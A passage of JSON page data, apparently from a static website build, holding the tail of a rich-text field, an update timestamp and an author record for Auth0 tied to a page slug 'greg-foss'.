more\",\"marks\":[],\"data\":{}}]}],\"data\":{}}]}"},"summary":null,"updatedAt":"2024-06-07T03:38:57.047Z","secAuthor":[{"id":"5a22e442-84ac-51b8-8b5e-3644b2409a03","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2gSAmLiqN9DEQXci1YqBvH/6d0ec38b369d8ae7a7b10ec93fdb664c/Auth0_logo_0.png"},"name":"Auth0","jobTitle":"","slug":"auth0","node_locale":"en"}]}]}},"pageContext":{"slug":"greg-foss"}}, "staticQueryHashes": []}